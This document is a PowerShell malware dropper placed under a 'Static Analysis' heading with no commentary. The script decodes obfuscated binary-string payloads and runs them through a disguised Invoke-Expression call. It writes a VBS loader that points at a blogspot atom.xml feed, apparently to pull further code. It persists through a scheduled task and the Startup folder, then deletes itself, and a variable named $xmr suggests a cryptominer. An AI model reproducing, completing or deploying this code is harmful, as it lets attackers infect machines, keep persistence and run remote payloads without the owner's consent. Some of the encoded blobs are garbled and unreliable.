Static Analysis

$KALOMADARI= "C:\ProgramData\TUKHAMTASSER"

ni $KALOMADARI -it d -fo

$PUDHAPATA = @'

$condumeing = '01001101010110101001*11*000000000001*000000001111111111111111000000000000000010111***0000001***************00000000000000001*00000000000000000111000011111101110100000111000000000101101000000100111001101001000011011100000000001010011001100110100100001010101000110100001101001011100110010000001110000011100100110111101100111011100100110000101101101001000000110001101100001011011100110111001101111011101000010000001100010011001010010000001110010011101010110111000100000011010010110111000100000010001000100111101010011001000000110110101101111011001000110010100101110000011010000110100001010001001***00000101000001000101000000000000000001001100000000010000001100000000100010010000011111011110011001***0000000000001110000000000000000011100000000100001011000000010011*00101010000000011000000000000000001011110000000001**000010101110110001110000011*01*00000000000111000000000011*000000001*0000001*000000000000000001*00001***0000000001***0000000000001100000000001*00000001***010000000000100000010000101*01*000001**0001

$bulgumchupitum = '*0101*001010011001100-01010110-0011*110-01*11010010110-10110-*1**1*1*1100101011*110110-1011001*110010101*010011010010110-0011*010-00100-1001010101*110-101*0100-10010-01*110010101*0010-00100-0010011*010-100100101*001001*11*10011010010110-0011*010-00100-100101*1*11*010-01*11*0100101001001**-1011*0101*1**01**01**01**01**01**01**01001*-*0011*01011001*11001*1100101011001*1*010011010010110-0011*010-00100-100101*1*11*010-01*11*01001**0-101001**01001*11*10011010010110-0011*010-00100-100101*1*11*010-01*11*010010-00101*0011*01011001*10100100110100101100-01101*0-01*0101*00101*001001*11*10011010010110-0011*010-00100-100101*1*11*010-01*11*010010-0010011*11001010110-001100-0-01*1101*001**0101011001**0110-00101001001**0101101001**0101*001001*11*10011010010110-0011*010-00100-100101*1*11*010-01*11*010010-0010011*11001010110-001100-0-01*1101*001**0100101001**0-*00101001001011*01**0100-0011**100-00101001*0101*1**01**01**01**01001*11001*1100101011*110110-1011001*1100101011001*1*1*11*010-01*11*01001**0-101001**

$Phudigum = '011001100111010101101110011*1011101*101001011011110110111*000***100101011*101101111011001*10010100101101010*001101001011011100110*0111001001111001010101*101111010101*100101011110*11010*000*1110110*01*0000*0000*0000*000*1100*10*011100100110*01101101001010*01101101110011011101*11001001101001011011100110011101011101001001*0*001101001011011100110*011100100111100101**10*011101*10*001010010*01*0000*0000*0000*0000*001*1001*100101011*101101111011001*100101011001*0101*100101011110*11010*0000*111010010000*011010110101001101111011010010110111*0000*0100*001*0*001101001011011100110*011100100111100101**10*011101*10*0010000*0110101110011011100*1011*1010010111010*0000*001110010100*111110011110*11101010111**110010111001111011001110*111101001010010010100*111110010*0010010*0100100100111001000*11110*000**10011011110111001001*010110*011*10110100*0110101001111011*00110101001100101011*10111010*000*111011001000*011011011*1011010*10*011100100101110101011011010*10110111101101110011101100110010101110010011101*0111010011101

function CON {

param(

[Parameter(Mandatory = $true, ValueFromPipeline = $true)]

[ValidateNotNullOrEmpty()]

[string]$BinaryInput

process {

$asciiChars = $BinaryInput -split '(?<=\G.{8})(?!$)' | ForEach-Object {

[char][Convert]::ToInt32($_, 2)

}

$asciiString = -join $asciiChars

Write-Output $asciiString

$xmr = CON $Phudigum

$xmr | .('{1}{$}'.replace('$','0')-f'!','I').replace('!','ex')

(CON $bulgumchupitum) | .('{1}{$}'.replace('$','0')-f'!','I').replace('!','ex')

$filePathToDelete = Join-Path $KALOMADARI "Sexology.~!!!!!!!!!!!!!!!!~"

Remove-Item -Path $filePathToDelete -Force

#the File will start cumiing to your pca

[IO.File]::WriteAllText("$KALOMADARI\\Sexology.~!!!!!!!!!!!!!!!!~", $PUDHAPATA)

$PUDHAPATA | .('{1}{$}'.replace('$','0')-f'!','I').replace('!','ex')

$gandkibarish = '011100110110010101111*011101010111010101110101001**0111101001**01*100111*0010011110111011101100101010100100111001101001*01*101011011*11011*01**010110101*1010101**1**1*010011110010111*001110011001**10010010111001001001101001**11011*111010101101110011001*1101011011*01011011*1101111001**11111*01**010111*101*00100111011110110011*101111101011110110011*00111110100100111001011010110011*100111011001*11*0101110011011001*1110111011001*1110111011001*0100111001011*01001110100100100100111001010010010111001110010011001010111*0011011*11*01011*110110010100101*00100111011001*11*0101110011011001*1110111011001*1110111011001*0100111001011*01001110110010101111*0010011100101001001**11111*01**111*0011010010110111001100111001**011*10011001*1101110010111*11**10111*11**10111*11*100111011001*1*00101*11101*11101*11101*11101*11101*11101*11101*11101*11101*11101*11101*11101*11101*11101*1**11*11011*01011011*11011*01**1*10101111*01100101011*1101110101011101*110010101*111011011*1101111011*10011*01011011*01**0101*001*1001*0110

$MAGAMUNMUN = CON $gandkibarish

$inkwur = 'backcponewmyn.blogspot.com////////////////////////////atom.xml'

$SEMIUYEL = $MAGAMUNMUN.replace('lundkalo',$inkwur)

[IO.File]::WriteAllText("$KALOMADARI\\kilng.vbs", $SEMIUYEL)

schtasks /create /sc MINUTE /mo 187 /tn clomepe /F /tr "wscript //nologo C:\\ProgramData\\TUKHAMTASSER\\kilng.vbs"

$sourceDir = "C:\ProgramData\TUKHAMTASSER"

$destinationDir = Join-Path $env:APPDATA "Microsoft\Windows\Start Menu\Programs\Startup"

Copy-Item -Path "$sourceDir\*.vbs" -Destination $destinationDir

$scriptPath = $MyInvocation.MyCommand.Path

Remove-Item $scriptPath -Force